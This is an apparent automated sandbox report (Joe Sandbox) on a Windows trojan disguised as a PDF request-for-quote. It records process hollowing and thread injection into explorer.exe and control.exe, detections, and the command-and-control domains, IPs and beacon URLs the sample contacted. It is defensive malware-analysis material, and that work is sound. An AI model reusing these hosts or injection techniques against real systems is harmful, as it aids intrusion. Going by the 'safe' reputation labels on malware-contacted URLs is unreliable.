          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383968 Sample: RFQ_AP65425652_032421 isu-i... Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.lideresdeimmunocal.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 7 other signatures 2->45 11 RFQ_AP65425652_032421 isu-isu,pdf.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\fsfomt.dll, PE32 11->29 dropped 55 Maps a DLL or memory area into another process 11->55 15 RFQ_AP65425652_032421 isu-isu,pdf.exe 11->15         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 15->57 59 Maps a DLL or memory area into another process 15->59 61 Sample uses process hollowing technique 15->61 63 Queues an APC in another process (thread injection) 15->63 18 explorer.exe 15->18 injected process9 dnsIp10 33 luegomusic.com 162.241.244.61, 49764, 80 UNIFIEDLAYER-AS-1US United States 18->33 35 www.pierresplayhouse.com 199.59.242.153, 49771, 80 BODIS-NJUS United States 18->35 37 19 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 control.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RFQ_AP65425652_032421 isu-isu,pdf.exe35%VirustotalBrowse
          RFQ_AP65425652_032421 isu-isu,pdf.exe42%ReversingLabsWin32.Trojan.Wacatac
          RFQ_AP65425652_032421 isu-isu,pdf.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll23%ReversingLabsWin32.Trojan.Wacatac

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.control.exe.4ca7960.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.control.exe.a0a460.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.72ad0000.5.unpack100%AviraHEUR/AGEN.1131513Download File
          2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.1364kensington.com/pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.thecapitalhut.com/pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.desertfoxindustries.com/pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.kf350.com/pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.tennesseewheelrepair.com/pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          https://rootedwithlovejax.com0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          www.luegomusic.com/pe0r/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.rootedwithlovejax.com/pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.pierresplayhouse.com/pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.ssfgasia.com/pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          luegomusic.com
          162.241.244.61
          truetrue
            unknown
            ssfgasia.com
            34.102.136.180
            truefalse
              unknown
              desertfoxindustries.com
              184.168.131.241
              truetrue
                unknown
                www.rootedwithlovejax.com
                216.239.36.21
                truefalse
                  unknown
                  td-balancer-euw2-6-109.wixdns.net
                  35.246.6.109
                  truefalse
                    unknown
                    www.kf350.com
                    107.178.142.156
                    truetrue
                      unknown
                      www.1364kensington.com
                      66.96.161.160
                      truetrue
                        unknown
                        www.pierresplayhouse.com
                        199.59.242.153
                        truetrue
                          unknown
                          tennesseewheelrepair.com
                          184.168.131.241
                          truetrue
                            unknown
                            www.essentials-trading.com
                            unknown
                            unknowntrue
                              unknown
                              www.coloradocouponclub.com
                              unknown
                              unknowntrue
                                unknown
                                www.tennesseewheelrepair.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.quickeasybites.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.ssfgasia.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.hzmsbg.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.lideresdeimmunocal.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.desertfoxindustries.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.thecapitalhut.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.luegomusic.com
                                              unknown
                                              unknowntrue
                                                unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.1364kensington.com/pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.thecapitalhut.com/pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.desertfoxindustries.com/pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.kf350.com/pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.tennesseewheelrepair.com/pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                unknown
                                                www.luegomusic.com/pe0r/true
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.rootedwithlovejax.com/pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.pierresplayhouse.com/pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.ssfgasia.com/pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0false
                                                • Avira URL Cloud: safe
                                                unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.tiro.comexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                            high
                                                            https://lh5.googleusercontent.com/tnT1qBMzmyLgRDNYg3gq78quEpuZVERk849E090SPkl3uZ90NtOdF0DdK28eDthwrRcontrol.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.goodfont.co.krexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://rootedwithlovejax.comcontrol.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.carterandcone.comlexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.typography.netDexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://fontfabrik.comexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.%s.comPAexplorer.exe, 00000005.00000000.660312730.0000000002B50000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    low
                                                                    http://www.fonts.comexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.sandoll.co.krexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.sakkal.comexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      199.59.242.153
                                                                      www.pierresplayhouse.comUnited States
                                                                      395082BODIS-NJUStrue
                                                                      35.246.6.109
                                                                      td-balancer-euw2-6-109.wixdns.netUnited States
                                                                      15169GOOGLEUSfalse
                                                                      66.96.161.160
                                                                      www.1364kensington.comUnited States
                                                                      29873BIZLAND-SDUStrue
                                                                      216.239.36.21
                                                                      www.rootedwithlovejax.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      107.178.142.156
                                                                      www.kf350.comUnited States
                                                                      8100ASN-QUADRANET-GLOBALUStrue
                                                                      162.241.244.61
                                                                      luegomusic.comUnited States
                                                                      46606UNIFIEDLAYER-AS-1UStrue
                                                                      34.102.136.180
                                                                      ssfgasia.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      184.168.131.241
                                                                      desertfoxindustries.comUnited States
                                                                      26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                                      General Information

                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                      Analysis ID:383968
                                                                      Start date:08.04.2021
                                                                      Start time:13:20:33
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 12s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:21
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/3@17/8
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 63.2% (good quality ratio 58.2%)
                                                                      • Quality average: 74.2%
                                                                      • Quality standard deviation: 30.5%
                                                                      HCA Information:
                                                                      • Successful, ratio: 99%
                                                                      • Number of executed functions: 88
                                                                      • Number of non-executed functions: 60
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 23.54.113.53, 104.43.139.144, 52.147.198.201, 168.61.161.212, 52.255.188.83, 20.82.210.154, 23.10.249.26, 23.10.249.43, 93.184.221.240, 52.155.217.156, 20.54.26.129
                                                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      199.59.242.153LWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                                      • www.simplyhealrhcareplans.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK
                                                                      RCS76393.exeGet hashmaliciousBrowse
                                                                      • www.addthat.xyz/goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz
                                                                      PaymentAdvice.exeGet hashmaliciousBrowse
                                                                      • www.sgdivergence.com/c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m
                                                                      0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                      • www.mybodtonheart.com/bei3/?8p=EZa0cv&2d=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzOxundmeb0pk/R87Q==
                                                                      RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                                      • www.krishnagiri.info/nsag/?MDK0g=hPHybZPWty89zdC7zz6D1Y5bPXZXETq0TT3iYhuvTaEiGqMWh7BB5kcULROPrIgmxQ/f1w==&UB=hR-4brtxaT5D4f3
                                                                      New Order.exeGet hashmaliciousBrowse
                                                                      • www.friendsed.com/ditf/?KvZpwPd=7CjyIVchQZXwoSp1jc0tC17NVLbOMlIdjZlIPcHCPGe34LEeqGe9fWkqZA8O62TU4Lu3&ARn=BjAtCdjxOrQ8pTgP
                                                                      ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                      • www.simplyhealrhcareplans.com/sqra/?Rl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK&_jqT2L=gBg8BF3ptlc
                                                                      payment.exeGet hashmaliciousBrowse
                                                                      • www.mybodtonheart.com/bei3/?M4YDYvh=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzCIiGxmJdo4&Rl=M48tiJch
                                                                      Order.exeGet hashmaliciousBrowse
                                                                      • www.getbacklink.net/cugi/?BlL=15D5Rlw69THVEJtjRVEnjixvCWz0IM/dTd5neGnMhVDDO36KfpjGt1+SA4NLCUy6JvG/&EZXpx6=tXExBh8PdJwpH
                                                                      PaymentInvoice.exeGet hashmaliciousBrowse
                                                                      • www.sgdivergence.com/c22b/?9rgH70GX=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&LL0=X4XDHNl0z
                                                                      SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                      • www.tollisenschool.com/g7b/?8p=chLXzryXh&tL30J=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBtE+arhNut
                                                                      swift_76567643.exeGet hashmaliciousBrowse
                                                                      • www.hicapitolize.com/m8es/?CVJ=sG6ecfng0YvqxX6BTfb7C0qDagoY2GDrv6xqwretuMrKP6q0Q4gvq6Z0725wPxuv0KtT&oX9=Txo8ntB0WBsp
                                                                      Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                      • www.tollisenschool.com/g7b/?RzulnV=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBHbOqrlPmt&QL3=tTypTNm0gPD0F
                                                                      2021-04-01.exeGet hashmaliciousBrowse
                                                                      • www.tollisenschool.com/g7b/?o2=iL30VlAxs&8pntMJ6P=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqlghXUv6T7qPq
                                                                      onbgX3WswF.exeGet hashmaliciousBrowse
                                                                      • www.sgdivergence.com/c22b/?w6=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&1b=W6O4DXSP5
                                                                      ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                      • www.bootstrapexpress.com/aqu2/?rPj0Qr6=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYIns7fxRpg&tXrx=gdkpfvSpm
                                                                      Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                      • www.simplyhealrhcareplans.com/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK
                                                                      PO.1183.exeGet hashmaliciousBrowse
                                                                      • www.dentalenhancments.com/god/?XDKPxrlh=EnxYEfX2deexTb058Y7c97BLkeqRbsEiixp341UOoiLWyojMB+48BbQ1WdyM7J0osU9+&anM=LjfLu4hPXh18f
                                                                      Scan-45679.exeGet hashmaliciousBrowse
                                                                      • www.wwwrigalinks.com/gwam/?Bjq=CXJcwEGd359wd7S74zzuJNqJGNLbtnXn+r8vDW7RCwie8OTRcmbQ6IgfXutP9/RkpDpW&Efzxz2=2dut_L3xNbOxThN
                                                                      TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                      • www.creditcorecard.com/ihmh/?wP9=1bJfls8sWvOO1f7Vh8wqJhCF9whiFTpEYoud4iYCKocbr8IRO//r9FkTIR4//YxGu1lm&lZQ=7nbLunBhP

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      www.1364kensington.comRFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exeGet hashmaliciousBrowse
                                                                      • 66.96.161.160

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      BODIS-NJUSLWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      RCS76393.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      PaymentAdvice.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      New Order.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      payment.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      Order.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      PaymentInvoice.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      swift_76567643.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
